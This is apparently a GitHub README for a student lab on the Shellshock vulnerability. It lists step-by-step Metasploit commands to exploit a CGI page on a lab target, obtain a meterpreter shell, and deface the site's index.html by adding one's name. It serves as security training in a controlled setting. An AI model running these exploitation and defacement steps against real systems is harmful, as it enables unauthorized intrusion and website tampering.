Skip to content

ritsec/academic21

Repository files navigation

RITSEC Academic Day - ShellShock

Setup

  • Open 'VMWare Workstation Pro'
  • Click on 'Kali Linux 2021' on the left side list of VMs
  • Right click again on 'Kali Linux 2021' and click 'Settings'.

settings

  • Select 'Network Adapter' and change it to 'Bridged'

bridge

  • Hit the Play Button to start the VM.
    • Username: kali
    • Password: kali

Viewing the Website

  • Click the top left logo to search for firefox.
  • Open your browser and head to http://<TARGET_IP>:8080

Attacking the Box - Commands To Run

  • Click the Black Box with the "$_" to open the terminal.

terminal

This will open the Metasploit Console.

  1. msfconsole

landing

Here, you are searching for the shellshock vulnerability to use.

  1. search shellshock

search

This is selecting the shellshock exploit.

  1. use 1

use1

This is seeing the module and payload options that will be configured.

  1. options

options

Setting the vulnerable cgi page to utilize.

  1. set targeturi /cgi-bin/vulnerable

targeturi

Setting the target hosting the site that we will attack.

  1. set rhosts <TARGET_IP>

Setting the port the website is being hosted on.

  1. set rport 8080

rport

Attack the box!

  1. exploit

exploit

Modifying the Website

With your meterpreter shell, now you can modify the website.

Most websites by default keep their files in /var/www. In our case, the index.html file contains the main page of the website.

Use the edit /var/www/index.html command to edit the file. Add your name to the website!

edit

  • Once you are in the text editor, press the 'i' key to go into insert mode.
  • Use the arrow keys to move down to the < li > section
  • Once you add your name, hit the 'ESC' key, type ':wq' and hit 'Enter'

nameadd

Now visit the website in your browser and see your name publicly hosted on the target site!!

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published